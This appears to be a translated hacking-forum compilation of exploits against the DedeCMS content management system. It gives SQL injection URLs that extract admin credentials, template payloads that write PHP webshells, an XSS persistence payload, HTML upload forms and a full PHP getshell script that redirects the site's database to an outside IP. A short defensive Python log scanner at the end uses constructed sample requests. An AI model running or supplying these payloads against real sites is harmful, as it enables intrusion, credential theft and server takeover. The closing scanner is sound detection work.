Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account, upload software, and in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with the password xiao, a one-line shell created directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; from then on, visiting either of the URLs below in any way triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you go straight into the site backend.

This vulnerability requires first obtaining the backend path.
Dedecms 织梦 tag remote file write vulnerability
Precondition: you must have your own dede database prepared, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is at 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member admin area, publish an article, upload an image, then in attachment management replace the image with our carefully constructed template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(constructed here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>
Submit; if the edit is reported as successful, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and last 7 characters removed, giving a 20-character MD5 value; from that, remove 3 from the front and 1 from the end to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS writing database error messages into a PHP file whose header performs no validation.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is shown.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
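Added here as a defender's example, not part of the original post: a Python scanner that flags, in constructed access-log lines, the request shapes this page collects, that is GLOBALS/cfg_* keys arriving through _COOKIE/_POST arrays (mytag_js.php, login.php and the getshell script), a literal sql parameter to plus/advancedsearch.php, ../ in edit_face.php's oldface, a script tag in gotopage, and UNION SELECT in infosearch.php's q. The log lines, IP addresses and hostnames are made up; only the paths and parameter names come from the page.

```python
"""Flag the DedeCMS request patterns collected on this page in access-log lines."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (combined log format); IPs, hosts and times are made up,
# the paths and parameter names are the ones the sections above describe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:01 +0800] "GET /plus/mytag_js.php?aid=1&_COOKIE[GLOBALS][cfg_dbhost]=attacker.example HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2012:10:00:02 +0800] "GET /dede/login.php?dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=198.51.100.7 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2012:10:00:03 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048
10.0.0.8 - - [01/Jan/2012:10:00:04 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2012:10:00:05 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024
10.0.0.10 - - [01/Jan/2012:10:00:06 +0800] "GET /plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,3%20from%20dede_admin HTTP/1.1" 200 1024
10.0.0.11 - - [01/Jan/2012:10:00:07 +0800] "GET /plus/advancedsearch.php?mid=1&q=shoes HTTP/1.1" 200 4096
10.0.0.12 - - [01/Jan/2012:10:00:08 +0800] "GET /member/index.php?uid=alice HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')
# Keys that would let a client write into $GLOBALS / cfg_* when DedeCMS registers
# request arrays as variables (the _COOKIE[GLOBALS][cfg_dbhost] trick used above).
OVERWRITE_KEY_RE = re.compile(r"^(GLOBALS|cfg_|_GET|_POST|_COOKIE|_SESSION)|\[(GLOBALS|cfg_[^\]]*)\]", re.I)
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")                 # ../ segments in a file-path value
SCRIPT_RE = re.compile(r"<\s*script|javascript:", re.I)      # reflected-XSS markers (gotopage)
UNION_RE = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)  # classic UNION-based injection


def classify_request(target: str) -> list[str]:
    """Return finding labels for one request target (path plus query string)."""
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes keys and values
    findings = []
    for key, value in params:
        if OVERWRITE_KEY_RE.search(key):
            findings.append("globals-overwrite:" + key)
        if TRAVERSAL_RE.search(value):
            findings.append("path-traversal:" + key)
        if SCRIPT_RE.search(value):
            findings.append("reflected-xss:" + key)
        if UNION_RE.search(value):
            findings.append("sql-injection:" + key)
    # advancedsearch.php taking a literal SQL statement is a design flaw: any 'sql' parameter is a hit.
    if parts.path.lower().endswith("/plus/advancedsearch.php") and any(k.lower() == "sql" for k, _ in params):
        findings.append("raw-sql-parameter:sql")
    return findings


def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (client_ip, findings) for each log line that matches at least one rule."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits


if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(findings))
```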